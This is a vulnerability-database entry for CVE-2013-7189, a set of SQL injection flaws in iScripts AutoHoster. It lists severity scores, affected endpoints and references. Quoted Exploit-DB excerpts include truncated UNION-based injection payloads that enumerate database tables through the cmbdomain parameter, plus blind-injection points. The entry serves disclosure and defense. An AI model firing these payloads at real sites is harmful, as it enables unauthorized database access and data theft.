CVE-2013-7189
Published: 2013-12-20
Priority: P3 · 46 · Severity: high · CVSS 2.0: 7.5 · Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 1.35% (68.2th percentile)
Multiple SQL injection vulnerabilities in iScripts AutoHoster, possibly 2.4, allow remote attackers to execute arbitrary SQL commands via the cmbdomain parameter to (1) checktransferstatus.php, (2) checktransferstatusbck.php, or (3) additionalsettings.php; or (4) invno parameter to payinvoiceothers.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| iscripts | autohoster | — | — |
No detection rules found.
Exploit-DB: iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection (exploitdb, 2013-12-15; CVE-2013-7189)
Source: https://www.securityfocus.com/bid/64377/info
iScripts AutoHoster is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to execute arbitrary commands or script code in the context of the application, and obtain sensitive information that may aid in further attacks.
/checktransferstatusbck.php
Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_sche
Exploit-DB: iScripts AutoHoster - 'additionalsettings.php' SQL Injection (exploitdb, 2013-12-15; CVE-2013-7189)
Source: https://www.securityfocus.com/bid/64377/info
Time based Blind Injection
/additionalsettings.php
Post : submit=faris&cmbdomain=%Inject_Here%
Exploit-DB: iScripts AutoHoster - 'invno' SQL Injection (exploitdb, 2013-12-15; CVE-2013-7189)
Source: https://www.securityfocus.com/bid/64377/info
/payinvoiceothers.php
invno=%Inject_Here%
Exploit-DB: iScripts AutoHoster - 'checktransferstatus.php' SQL Injection (exploitdb, 2013-12-15; CVE-2013-7189)
Source: https://www.securityfocus.com/bid/64377/info
/checktransferstatus.php
Table name : submit=faris&cmbdomain=i-Hmx' /*!1337union all select 0x6661726973,(select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from information_schema.tables where table_schema=dat
No writeups or analysis indexed.
References:
- http://osvdb.org/101049
- http://osvdb.org/101050
- http://osvdb.org/101051
- http://osvdb.org/101053
- http://seclists.org/fulldisclosure/2013/Dec/121
- https://exchange.xforce.ibmcloud.com/vulnerabilities/89816